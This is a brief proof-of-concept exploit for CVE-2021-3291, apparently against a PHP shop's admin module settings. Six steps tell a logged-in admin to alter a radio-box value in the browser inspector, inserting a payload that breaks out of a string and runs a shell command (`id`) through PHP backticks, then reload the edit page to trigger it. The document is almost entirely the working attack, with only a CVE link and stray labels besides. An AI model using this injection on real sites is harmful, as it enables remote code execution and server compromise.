1-) login as admin
2-) get any modules edit page
3-) inspect element any true radiobox
4-) change true to true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //
5-) click update
6-) to trig command go again edit page
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
Metasploit
GIF